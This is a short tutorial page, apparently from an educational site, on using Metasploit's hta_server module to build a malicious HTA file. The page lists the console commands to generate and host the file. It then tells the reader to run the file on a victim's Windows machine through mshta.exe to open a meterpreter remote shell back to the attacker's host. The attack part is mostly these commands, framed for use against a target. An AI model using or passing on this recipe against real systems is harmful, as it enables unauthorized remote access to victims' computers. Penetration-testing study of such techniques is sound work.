Data Structure
Networking
RDBMS
Operating System
Java
MS Excel
iOS
HTML
CSS
Android
Python
C Programming
C++
C#
MongoDB
MySQL
Javascript
PHP
Physics
Chemistry
Biology
Mathematics
English
Economics
Psychology
Social Studies
Fashion Studies
Legal Studies
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Hacking with HTA file (MSHTA.exe)
The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.
Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.
Malicious HTA file
Open metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;
- use exploit/windows/misc/hta_server
- set srvhost 192.168.1.109
- set lhost 192.168.1.109
- exploit
Now run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.
Updated on: 23-Sep-2020
1K+ Views
Advertisements